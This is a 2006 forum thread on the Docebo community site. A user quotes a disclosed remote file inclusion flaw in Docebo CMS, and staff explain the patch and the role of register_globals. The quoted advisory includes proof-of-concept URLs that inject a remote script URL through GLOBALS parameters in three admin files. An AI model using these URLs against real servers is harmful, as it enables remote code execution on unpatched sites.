docebo.com community - security: has this problem been fixed?

Navigation area
Language selection
Top menu
Top menu
Top menu
Jump to module content Forum
Page footer

Message for this thread
Posted by	Messages text
Stewart David Total post : 16 Profile	Written on : 18/09/2006 19:55 ( more than one month ) Object : security: has this problem been fixed? I found this on the internet while I was searching for information on how to customize docebo (still don't know how to customize it) http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046720.html 1) Description: Error occured in news_class.php, include_once($GLOBALS['where_framework']."/lib/lib.listview.php"); include_once($GLOBALS['where_framework']."/lib/lib.treedb.php"); include_once($GLOBALS['where_framework']."/lib/lib.treeview.php"); Error occured in content_class.php, include_once($GLOBALS['where_framework']."/lib/lib.listview.php"); include_once($GLOBALS['where_framework']."/lib/lib.treedb.php"); include_once($GLOBALS['where_framework']."/lib/lib.treeview.php"); Error occured in util.media.php, include_once($GLOBALS["where_cms"]."/admin/modules/media/media_class.php"); The users can include a remote file because the $GLOBALS['where_framework'], $GLOBALS['where_cms'] isn't sanitized 2) Proof of concept: http://example/doceboCms/[dc_path]admin/modules/news/news_class.php?GLOBALS[where_framework]=[cmd_url] http://example/doceboCms/[dc_path]admin/modules/content/content_class.php?GLOBALS[where_framework]=[cmd_url] http://example/doceboCms/[dc_path]admin/modules/block_media/util.media.php?GLOBALS[where_cms]=[cmd_url] 3) Solution: include file where are declare $GLOBALS[*]

Erba Claudio Total post : 2688 Profile	Written on : 18/09/2006 21:02 ( more than one month ) Object : Re: security: has this problem been fixed? Hello Dave, Then, regarding the security fix I think that all has been fixed with 3.0.4 but ... this is not docebo fault but php fault. We had to correct it and the proof of concept works only in vulnerables server with safe modo set to off. Then, if you have a: Vulnerable server with safe_mode to ON a not vulnerable server A non patched version of docebo will not be affected If your server is vulnerable and docebo is not patched you will be affected. But it is a php vulnerability not docebo vulnerability. You can see the php warning here And you can download the security test suite clicking here Regarding the customization youhave to work only on css files. Ciao Claudio Docebo CEO and Founder www.docebo.com

Fabio Pirovano Total post : 538 Profile	Written on : 18/09/2006 22:00 ( more than one month ) Object : Re: security: has this problem been fixed? The right param to check is register_globals not safe_mode, a server is vulnerabile only if the register_globals is on. In any case the php have fix this bug with PHP 4.4.1 or PHP 5.0.4 or later. I rember also a fix for the version 4.3.10 but i'm not sure. Ciao Fabio Docebo Staff - Docebo 4 released! -

Stewart David Total post : 16 Profile	Written on : 19/09/2006 00:34 ( more than one month ) Object : Re: security: has this problem been fixed? Thank you for responding. The host is using php 4.4.4 so, according to Fabio, it should be ok. Php version 4.4.4, mysql 4.0.27, apache 1.3.37 (unix) "safe_mode" configuration Off Configuration of "register_global" On Configuration of "magic_quotes_gpc" On

Erba Claudio Total post : 2688 Profile	Written on : 19/09/2006 09:23 ( more than one month ) Object : Re: security: has this problem been fixed? Hi dave For being completly sure try our tst package :-) Claudio Docebo CEO and Founder www.docebo.com

Stewart David Total post : 16 Profile	Written on : 22/09/2006 17:30 ( more than one month ) Object : Re: security: has this problem been fixed? Actually, I did run the globals rewirte test that you posted on the news page before I found the site that had this security problem. I didn't know that this was the same problem. The test gave me the green :) so everything is ok.

Erba Claudio Total post : 2688 Profile	Written on : 22/09/2006 18:31 ( more than one month ) Object : Re: security: has this problem been fixed? Both two test? ;-) Claudio Docebo CEO and Founder www.docebo.com

Stewart David Total post : 16 Profile	Written on : 22/09/2006 18:55 ( more than one month ) Object : Re: security: has this problem been fixed? Yes, I just tried it again. Both give green :)